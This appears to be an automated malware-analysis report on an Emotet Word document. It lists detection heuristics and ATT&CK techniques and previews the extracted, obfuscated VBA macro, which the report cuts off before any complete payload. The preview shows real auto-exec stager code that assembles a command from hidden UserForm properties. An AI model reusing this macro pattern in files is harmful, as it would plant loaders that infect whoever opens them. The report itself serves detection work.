MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains a VBA macro that automatically executes upon opening the document, as indicated by the 'Document_Open' macro and 'OLE_VBA_AUTOEXEC_EXEC' heuristic. The 'OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER' heuristic strongly suggests the use of a hidden UserForm to execute commands, a known technique for Emotet. ClamAV detection further confirms the malicious nature and identifies it as Emotet.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-7465580-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7465580-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10718 bytes |
SHA-256: f053c2d825e87c0fa6eca97ea9fe652baf2c38270352bad0cf893d51dfe348aa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Cspsufnz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Aunztkpm, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Semhlyhungfb
Case Qazimmpmm
Uzkansjrikt = Sin(Xelsceughdwpp)
Befruuryw = CStr(Nwkoxxhd)
Awkixhnvo = 324
Tdpefbxcffpyb = Sin(Vsgzhmoybhujx)
Dhicusuk = CStr(Jbfblxirzlvpp)
Ffowksaobc = 567
Ywfbhndxliw = Sin(Mrxbinsero)
Nhdjmdyeh = CStr(Tjnblfawizny)
Mtoolhhr = 5645
End Select
For Gaoyfxkccxes = Gyqsfgajcg To Jpvcmbouvl
While Rkolwdyu <> Inqpmotw
Zunvgzkcd = Uhpausonzie * Atn(Hilxpzbyo) * (Xwsewsvr + Nfbprwejxz)
Wend
Next
Select Case Ehcvbvyvfllez
Case Vptrgxlbqjn
Bigyhjktz = Sin(Tisciseckm)
Tfpztfmmomq = CStr(Emwqiuvhgxxei)
Flyvevntrkrnn = 324
Gsygefhmcsbfm = Sin(Vkmngdoupbrs)
Qghliqffc = CStr(Xywcdpalzpgb)
Vsyjfmmcglm = 567
Ernpixujesrl = Sin(Hgrjehwnxhw)
Fuskqkvw = CStr(Zyeffragxt)
Wpbimxrtf = 5645
End Select
For Vpplhbbpun = Lzbrvxaydgay To Hyyfaggnjq
While Sewdbrcxq <> Fvwfvhporh
Crpnnlyqlbqe = Zeivgszn * Atn(Dbkfubyxuk) * (Meomrsyefs + Hkgvbgupzfjm)
Wend
Next
Select Case Oojbeagwicek
Case Qlairjtk
Dzziuydp = Sin(Kinuycdmwgxza)
Ruwnhyeo = CStr(Eaybjypocriyg)
Fhntfezpgdd = 324
Ozgthvub = Sin(Mhhkystsnm)
Qqvatflr = CStr(Rnadlorkp)
Xblxtawn = 567
Udnipyhcpqn = Sin(Qukvhebdx)
Spjczeoe = CStr(Wjnuvpkiawn)
Vdjfoijmwsmp = 5645
End Select
For Eckbjyrtkwb = Quwonhvnypz To Ecarbevafgqv
While Cbsnedttsad <> Fbgmkbnto
Vwqokogtjusl = Vwclkznc * Atn(Yztftptoizr) * (Eietkonmqz + Elidtftaaql)
Wend
Next
Ypcskfcvzt
End Sub
Attribute VB_Name = "Yawrhmbhsbwi"
Attribute VB_Base = "0{7F8AEFF3-2154-43B0-967E-7377B9A77D23}{888694DE-11C7-47AE-B819-FD4F5BF00557}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Uoagpajvxmfo"
Function Ftcaxdmib()
Select Case Mbrsopgly
Case Ewpyfntwfacyj
Clebwramhmwtt = Sin(Uxhtnzfx)
Vxjekchfqmvgw = CStr(Ejhliuznd)
Rqzxwocfb = 324
Hxjpncwgnax = Sin(Pxltcvjgyf)
Ftpgerhmnbk = CStr(Gxrxretdqhzc)
Glkjrxxi = 567
Zjipzvonj = Sin(Xrihbsnolqevo)
Dssevxnl = CStr(Vddvtlsjg)
Bbpfktypvouo = 5645
End Select
For Vufeykflzgpj = Fllhshbqdzke To Ctbofcyrmeiyo
While Jpbzgkjc <> Rrergtuujjgfa
Toygzttkotj = Jlsqosnl * Atn(Glneegwepxjnw) * (Ndygqyxjqkyqp + Qezosvloo)
Wend
Next
Wgcuxwrgcn = Cspsufnz.Aunztkpm
Select Case Ihntanmjqteh
Case Bqswvrvdplpm
Byzkpmhm = Sin(Eprhokxxu)
Hvjkazerbd = CStr(Misuurpjo)
Rfzoofosrq = 324
Dpapncvjcqif = Sin(Qdfefucjrfakp)
Lwruooetcc = CStr(Vibxupsplmmk)
Tyvocmjwrtq = 567
Hmjccyagbq = Sin(Uxwaykhxx)
Ynzukzrig = CStr(Kcckklwks)
Iipmvsijomm = 5645
End Select
For Oceqhjhbxo = Yoavancykfre To Yzxutyxr
While Ggciamltc <> Einnykhbjkzte
Ecvowhtsp = Txxtycegtr * Atn(Unpplxgmx) * (Ijxnwplqysnq + Plxpyrqu)
Wend
Next
Yinsimowtqe = Wgcuxwrgcn + Yawrhmbhsbwi.Cmhrumweun + Yawrhmbhsbwi.Oevfeynstu + Yawrhmbhsbwi.Fybkwkiqtokz
Select Case Fvdidzzqa
Case Rvneidjntrl
Jcdljgip = Sin(Jockacfwj)
Yvoxnbreznue = CStr(Awnguqzbqdpgs)
Nubpflhonv = 324
Kprpjylafsp = Sin(Vwelihiitm)
Pynsizkpzomz = CStr(Hgjfufmfj)
Dfovirdy = 567
Ayhxsezlgkfw = Sin(Czorngkoyqftw)
Xibrlhibica = CStr(Cexgdpticlkq)
Zrsyigujbe = 5645
End Select
For Stxgpntpmts = Gzivwqbbvjk To Sgatdtbm
While Lwwxwuzf <> Ibgloendpwjn
Vnpsqzxdjz = Atfgwdmxuqaof * Atn(Ywaqygkcj) * (Pyverhope + Jzgasrenbnruz)
Wend
Next
Pssdlvjcauhfr = Yinsimowtqe + Yawrhmbhsbwi.G
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.